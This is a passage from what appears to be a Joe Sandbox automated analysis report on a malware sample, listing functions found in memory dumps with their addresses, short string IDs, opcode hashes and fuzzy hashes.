                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (:?I
                                                            • API String ID: 0-987818883
                                                            • Opcode ID: 269f7f223d918341b58daef09c7981cbf3e3e85cb127c0948ea210bd0be457fc
                                                            • Instruction ID: c3958911d8e3b9341b5fbe31ff9739e14b60e6a9335a0b29d464fff61cac9fd0
                                                            • Opcode Fuzzy Hash: 269f7f223d918341b58daef09c7981cbf3e3e85cb127c0948ea210bd0be457fc
                                                            • Instruction Fuzzy Hash: AD31E63091C98EDEEB68FF5494516BDB7B1FF4A3A0F50117AD42ED6281CA387D409B81
                                                            Function 00007FF849348E60 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: 52f1d579bf6b64c5128b283d86ec53ddbf3bb7f3ca36c88aa7b70255f4b382a6
                                                            • Instruction ID: df0b93a3ad6c10628b1e28389d6cf5f46b56080ba6967f9b52bd83cfefb6004f
                                                            • Opcode Fuzzy Hash: 52f1d579bf6b64c5128b283d86ec53ddbf3bb7f3ca36c88aa7b70255f4b382a6
                                                            • Instruction Fuzzy Hash: 18317B3081C5E74EF73AAB2858605B47B52EFA3741B1A56FAD08ACB4C7D92CBCC18341
                                                            Function 00007FF848FBECA2 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X<I
                                                            • API String ID: 0-4150523163
                                                            • Opcode ID: 0c7c32d005597f641c2b70c4cf30831053927daf9c2f4656bc0847ce596466e6
                                                            • Instruction ID: 58ff88b34ad85e4fcba848546d400ddca855c1120d2cedbb4d299b56bcf7dae4
                                                            • Opcode Fuzzy Hash: 0c7c32d005597f641c2b70c4cf30831053927daf9c2f4656bc0847ce596466e6
                                                            • Instruction Fuzzy Hash: E421D271E1891D9FDF98EB58D4A5AECB7B1FB68340F0041BAD00EE7691CB35A981CB44
                                                            Function 00007FF849346262 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: 7c51844333426a5bdb36f6ceda019b6706fed7decf6ad504a2d7651def3b0e0a
                                                            • Instruction ID: 044cd56349f18e50119d99c04383e57dbcb81c4d0f99ba94af831d550bb279d9
                                                            • Opcode Fuzzy Hash: 7c51844333426a5bdb36f6ceda019b6706fed7decf6ad504a2d7651def3b0e0a
                                                            • Instruction Fuzzy Hash: C721D731E1895D9FDFA8EF18C895AEDB7B1FB59304F0141AAD04EE3291CE35A9818F41
                                                            Function 00007FF84934A6FD Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: pV?I
                                                            • API String ID: 0-1972698762
                                                            • Opcode ID: 6ec5bc039acf83a4fb96c91e390e3e10e48709702e6e93f4cb2bfc1ccc0729e4
                                                            • Instruction ID: 5b984c1a8a2a56c0b5e3325547cde0170cc44fc866bf27daa9f420ad3fbf3ecf
                                                            • Opcode Fuzzy Hash: 6ec5bc039acf83a4fb96c91e390e3e10e48709702e6e93f4cb2bfc1ccc0729e4
                                                            • Instruction Fuzzy Hash: 1F11A532D1D9DD8EF774BA5844192FEB7E5FF4A3A1F10143AD04ED7181DE6428026681
                                                            Function 00007FF848FBEAE7 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X<I
                                                            • API String ID: 0-4150523163
                                                            • Opcode ID: d72eaefddb16ebcbf5f5fe2aca3d750775cba836015c18b2e877a84d16b1d00f
                                                            • Instruction ID: 1de512aa5e9a0bcb95f4d69e53d07f0d3554e209263f54e787d292513a9d2d19
                                                            • Opcode Fuzzy Hash: d72eaefddb16ebcbf5f5fe2aca3d750775cba836015c18b2e877a84d16b1d00f
                                                            • Instruction Fuzzy Hash: 38019C70D4855A9FCF98EF18C894BA8B7B1EB68301F1044EED00EE7691DA35AA84DF50
                                                            Function 00007FF848FBA90F Relevance: .4, Instructions: 427COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 389379ac54befefba5e78412acc350101b163b261ea2a87dce7d2888dce9d521
                                                            • Instruction ID: 6e6984c3c41bf74c5ee121e9d050973660c21c5f28e724c0690878924ac7c9e5
                                                            • Opcode Fuzzy Hash: 389379ac54befefba5e78412acc350101b163b261ea2a87dce7d2888dce9d521
                                                            • Instruction Fuzzy Hash: D1F1BD709196468FEB59EF18C4D06B43BA1FF59350F5445BDC84ACB2CADB38E885CB84
                                                            Function 00007FF848FB127F Relevance: .4, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40894bc8f6c46199c94d4d1570f2462ce2c290e5f3fb3aca6123e154f1192a34
                                                            • Instruction ID: c84e0f1012f44ce8bf53b7c0c8ae3f87f05701a27261ecc89bae455a8f181ce3
                                                            • Opcode Fuzzy Hash: 40894bc8f6c46199c94d4d1570f2462ce2c290e5f3fb3aca6123e154f1192a34
                                                            • Instruction Fuzzy Hash: A3F1BE3091C6468FEB49DF18C4E06B47BA1FF55350F5446BDC84B8B68ADB38E882CB85
                                                            Function 00007FF848FB22C1 Relevance: .4, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f074a96515bc82a96c9bd699a30904398b965ebc280746d34a25ab97d96e76d4
                                                            • Instruction ID: 243f29e64f8437566ef891ca44990c5b133cb71a9a68c98f7cebdfced62fa456
                                                            • Opcode Fuzzy Hash: f074a96515bc82a96c9bd699a30904398b965ebc280746d34a25ab97d96e76d4
                                                            • Instruction Fuzzy Hash: D9D1EF30A1CA468FE369EB68D4951B577E1FF64350F14067EC48AC3AC6EB39B842CB45
                                                            Function 00007FF848FBB951 Relevance: .4, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c32aae1b1a941b089601d880c6ae5b836ff40e09b56742aed9de59b2cd68b4ae
                                                            • Instruction ID: 43734027e48ec4dd7f8df5229864283cda7fefd556f2582dad42129c2bc5f82e
                                                            • Opcode Fuzzy Hash: c32aae1b1a941b089601d880c6ae5b836ff40e09b56742aed9de59b2cd68b4ae
                                                            • Instruction Fuzzy Hash: 4ED1DF30A2CA468FE368EB28D49517577E1FF64340F24497EC48AC76C6DF29B9428749
                                                            Function 00007FF849341ED1 Relevance: .4, Instructions: 410COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29e5edd92a8fa1f59d1f0763a8bb469e6311d157171af7134cdd8bac16bbc71d
                                                            • Instruction ID: 5baddad618d6a56eb10b0a253feac3b663d67388ce43a2bbb417eceae335248f
                                                            • Opcode Fuzzy Hash: 29e5edd92a8fa1f59d1f0763a8bb469e6311d157171af7134cdd8bac16bbc71d
                                                            • Instruction Fuzzy Hash: 97D1F130A0CB868FE7B8EF28D49157577E1FF46380B1555BEC48AC3686DE29B842CB41
                                                            Function 00007FF849340E8F Relevance: .4, Instructions: 381COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41e48a7a8e48fb8d3e96df43b438adbd3656ba155000569b3a5ab6eb8721e89d
                                                            • Instruction ID: 4e736584e2826026b61723eba4b429f71849e1be1cfb09f1f2cb9513e5beed9d
                                                            • Opcode Fuzzy Hash: 41e48a7a8e48fb8d3e96df43b438adbd3656ba155000569b3a5ab6eb8721e89d
                                                            • Instruction Fuzzy Hash: 6EE1C23051CA968FEB68DF54C4E09B13BA1FF56340B5555BDC84ACB68BD638E882CB41
                                                            Function 00007FF848FBA92F Relevance: .3, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccce4ae1551f18edab714421bc3af9fcf592c2222e0c3096045ec78f7d42253b
                                                            • Instruction ID: 9649e3e76f90277a293435afa6d2d081d32249ac6b0005230bed4408388cd03e
                                                            • Opcode Fuzzy Hash: ccce4ae1551f18edab714421bc3af9fcf592c2222e0c3096045ec78f7d42253b
                                                            • Instruction Fuzzy Hash: 22C19B7091D6468FEB19EF08C4E05B537A1FF55351F6445BDC84A8B6CADB38E881CB88
                                                            Function 00007FF848FB129F Relevance: .3, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a392137f2e82f83368f43a35aa8f41ffe6e39da91fb768c39c7edf1910ad057
                                                            • Instruction ID: 64c2ab2c8a3ad761b6301ad8a60ddf6ef815022f465684a54f474c225875989b
                                                            • Opcode Fuzzy Hash: 7a392137f2e82f83368f43a35aa8f41ffe6e39da91fb768c39c7edf1910ad057
                                                            • Instruction Fuzzy Hash: 1AC18B7061C6468FEB09DF18C4E05B177A2FF55350B5846BDC84B8B68EDB38E882CB85
                                                            Function 00007FF849340EAF Relevance: .3, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c474ee72621f27d41cc7b969f5376147ff8f82ca362ef05c5c775a852f74eb1
                                                            • Instruction ID: ecc574ed5c50bc260db7e678f866198ebc338cc3b4378bd87c653393c5fe1fc4
                                                            • Opcode Fuzzy Hash: 2c474ee72621f27d41cc7b969f5376147ff8f82ca362ef05c5c775a852f74eb1
                                                            • Instruction Fuzzy Hash: DAC1A03051CA968FEB2DDF44C0E09B537A1FF56354B5555BDC84ACB68BDA38E881CB80
                                                            Function 00007FF848FBA1C2 Relevance: .3, Instructions: 321COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d14b11e3e35bbd137f95935e9f05cd7038e8a1e66e9abcdec85524b1b17c31
                                                            • Instruction ID: 07487f002f2abd680557051ff986ab0dd31781ef546671dc79e19cbbf9744974
                                                            • Opcode Fuzzy Hash: c7d14b11e3e35bbd137f95935e9f05cd7038e8a1e66e9abcdec85524b1b17c31
                                                            • Instruction Fuzzy Hash: 4FB1E230A1DA469FE749EB28C0946B4B7E1FF69350F544179C04EC7AC6DB28B8A1CB94
                                                            Function 00007FF848FB7B97 Relevance: .3, Instructions: 303COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d6a2946708a6dba8e0b6c669416380d7be6ee18d3f9a8b9639b4bffb5c27cb6
                                                            • Instruction ID: 3b9a4cdf4fb716cfb5a1a0564a097e4eda3c79e8aef7538f6c0a1875669255a5
                                                            • Opcode Fuzzy Hash: 7d6a2946708a6dba8e0b6c669416380d7be6ee18d3f9a8b9639b4bffb5c27cb6
                                                            • Instruction Fuzzy Hash: 8721B472E0DDD78FF66AB76828560FC6A50AF653E1F2805BAC04D864C7DF0C3854539A
                                                            Function 00007FF848FB0B8A Relevance: .3, Instructions: 303COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 145d36cad8580789672ca6f499dfe5c7b96d2b961d0964372faefdbb6f207d60
                                                            • Instruction ID: e8189ffed27a32e1dc30a41f5340e29105b080e72a0ee8e549630a79a57a8d2f
                                                            • Opcode Fuzzy Hash: 145d36cad8580789672ca6f499dfe5c7b96d2b961d0964372faefdbb6f207d60
                                                            • Instruction Fuzzy Hash: A2B1B37091CA469FE749FB28C4906B4B7A1FFA5340F5441B9C84EC7AC6DB28F851CB98
                                                            Function 00007FF848FC713E Relevance: .3, Instructions: 280COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dce12d3c01aa358ede02cc9475ec76233fc1834b2255b91335d8b0c728d73787
                                                            • Instruction ID: 8c58ae6525f16e6284663325abf793050a3121cca9c48f74750320e45545915f
                                                            • Opcode Fuzzy Hash: dce12d3c01aa358ede02cc9475ec76233fc1834b2255b91335d8b0c728d73787
                                                            • Instruction Fuzzy Hash: C2A1033091C9568FEB99EB1CC4906B47BA1FF56350F5441BEC44ACB2CBDB38A982CB44
                                                            Function 00007FF84934844F Relevance: .3, Instructions: 269COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69a97b9305f8753786b0a65180d4d6a12bfcebedeae5d2bd182135dea6b3819f
                                                            • Instruction ID: 1ee967d29eb647a137453e6bee6c9a24ef4fc8490794c12b43170d6ef57b0c4c
                                                            • Opcode Fuzzy Hash: 69a97b9305f8753786b0a65180d4d6a12bfcebedeae5d2bd182135dea6b3819f
                                                            • Instruction Fuzzy Hash: 79A1D53091CA869FE799EF28C4906B4B7E1FF16344F5551B9C44ECBA86CB28F851CB90
                                                            Function 00007FF8493478E6 Relevance: .3, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 865ec052d3692a6e4fc29c16538d58e4c8a4ad54aa82b898a282ae6f7f529c2d
                                                            • Instruction ID: e8d276574f0532a825b80b26e840876505e46159bd62d9f1c85be141ae5685ea
                                                            • Opcode Fuzzy Hash: 865ec052d3692a6e4fc29c16538d58e4c8a4ad54aa82b898a282ae6f7f529c2d
                                                            • Instruction Fuzzy Hash: D8812931A1DA864FE778BF2894451B5B7E1EFC6390F16157ED08FC3282DE29B8028752
                                                            Function 00007FF848FB7828 Relevance: .3, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04bdcb11172317f7e7f70ae6b6d7b68d276e66e54ce8885b9e6ee2044b549892
                                                            • Instruction ID: 8ac155ad4e998a4bbb220f479cd610126ee6384c514f8e85f6eff3032f0623a4
                                                            • Opcode Fuzzy Hash: 04bdcb11172317f7e7f70ae6b6d7b68d276e66e54ce8885b9e6ee2044b549892
                                                            • Instruction Fuzzy Hash: 2381F23590CD4A8FE768FB2888565B477D0FF69390F2402B9D19EC76E2DF18A806C785
                                                            Function 00007FF8493465EB Relevance: .2, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3808503008882e3a72911a8c69223fc997817227c53cd7228c0df4203080134
                                                            • Instruction ID: 923c2f9bd400acb65f0e1a72920b8343a2f432d54c5efadd51b627dc3da527da
                                                            • Opcode Fuzzy Hash: c3808503008882e3a72911a8c69223fc997817227c53cd7228c0df4203080134
                                                            • Instruction Fuzzy Hash: 7371D130D1C68E8FEBA9EF6488546BD7BA1FF46388F1114BAD00ED71C2DE296841CB41
                                                            Function 00007FF848FBF02B Relevance: .2, Instructions: 239COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 99b8feea364a6776fe4bf2fdbea2bd6b1422969ab2b823bb50ec59d0fa21fc17
                                                            • Instruction ID: f920d1d2915f9f7332b623e3bcf7044a55cff82a9919e931d0b79fab8a4a6eb5
                                                            • Opcode Fuzzy Hash: 99b8feea364a6776fe4bf2fdbea2bd6b1422969ab2b823bb50ec59d0fa21fc17
                                                            • Instruction Fuzzy Hash: FD81BF30D1D54A9FEB99EB68C8506BCBBA1FF69380F1004BAD40AD71D2DB38A8428755
                                                            Function 00007FF849345A3D Relevance: .2, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e8f428935ef5843f4114d93e18fca50ad3f7e106230d6772ec7c57e6aa7e089
                                                            • Instruction ID: 7003d9db9c2403f9b21bc5361bcd1695edc8c659a4be2a774f0b0b22171f5bd1
                                                            • Opcode Fuzzy Hash: 4e8f428935ef5843f4114d93e18fca50ad3f7e106230d6772ec7c57e6aa7e089
                                                            • Instruction Fuzzy Hash: DF612631D0D8CD8FE7B8FE1898565F837D1FF86351B1612B9D09EC35A2DE18A8068782
                                                            Function 00007FF849349B41 Relevance: .2, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2781a245ccc6c915b0384ad0a9cdb83a16c2afb48c201e5d49909a3ff112190e
                                                            • Instruction ID: f8fa54620bc7b172d3e11b2c9b2911749e48e43c0597900c042a2f40a4f61309
                                                            • Opcode Fuzzy Hash: 2781a245ccc6c915b0384ad0a9cdb83a16c2afb48c201e5d49909a3ff112190e
                                                            • Instruction Fuzzy Hash: A091C03090CB868FE378EF14C99557177E1FF46748B2165BDC48AC7A92CB29B842CB80
                                                            Function 00007FF848FB840B Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 98d7edf0a8581f44a562aa06450ae91a621f4a6c245a56a355cea4c0014d86ed
                                                            • Instruction ID: 299ad1a1450bd5b4c136649c35962b032be44082a531707657ddaf01487e0af3
                                                            • Opcode Fuzzy Hash: 98d7edf0a8581f44a562aa06450ae91a621f4a6c245a56a355cea4c0014d86ed
                                                            • Instruction Fuzzy Hash: 4571C030D2D64ACEEB95EB2488546FD7BA1FFA53D0F9405BAD00EC71C2EF2868429744
                                                            Function 00007FF84934343D Relevance: .2, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cda53d981ad4a7a6f1e3733a53163ddc81591d422bce2e9f18105c8c38fe98bd
                                                            • Instruction ID: e2600e464cd2db8b33ca28126971f45131bcd7679611f84a785ef5804e80b3be
                                                            • Opcode Fuzzy Hash: cda53d981ad4a7a6f1e3733a53163ddc81591d422bce2e9f18105c8c38fe98bd
                                                            • Instruction Fuzzy Hash: DE61383190C4C94FE7B8FE1C995A5F977D1FF4A360B1612F9D09EC35A2DE18A8068B81
                                                            Function 00007FF848FBE76D Relevance: .2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ae067ee0c567bf8466a62866e7e01b606f955cfe448fea800a1e693e60265be
                                                            • Instruction ID: 62aa2ab9734154bea8d2d4d1bd66115a7577d6021a7fec289c464576707442d3
                                                            • Opcode Fuzzy Hash: 5ae067ee0c567bf8466a62866e7e01b606f955cfe448fea800a1e693e60265be
                                                            • Instruction Fuzzy Hash: FF614635D0C8498FE768FB18985A5B837D1FFA5350F6402B9D09ECB5E2DF18E8068785
                                                            Function 00007FF849356D4E Relevance: .2, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 201e0a4900fdab5354c36834270d3f26ef935fc868c9108c202d05e4e12a685f
                                                            • Instruction ID: 97210420e85c211e61b5de45de58a3f389c35d3c20127b55ac4368093a4a2480
                                                            • Opcode Fuzzy Hash: 201e0a4900fdab5354c36834270d3f26ef935fc868c9108c202d05e4e12a685f
                                                            • Instruction Fuzzy Hash: F861F33090DA868FD759EF18C5905B0FBA0FF1A3A4F5491BEC44AC7A86DB28B851C791
                                                            Function 00007FF848FB00AA Relevance: .2, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40016d272ed287881f3ac6b5babbb4b85292c9d235d26c6c87dfbecd8f38c478
                                                            • Instruction ID: 726e1803a1a2de1779e5751ddbc4750ef7eb892fc1ac13fb45d750f63615e180
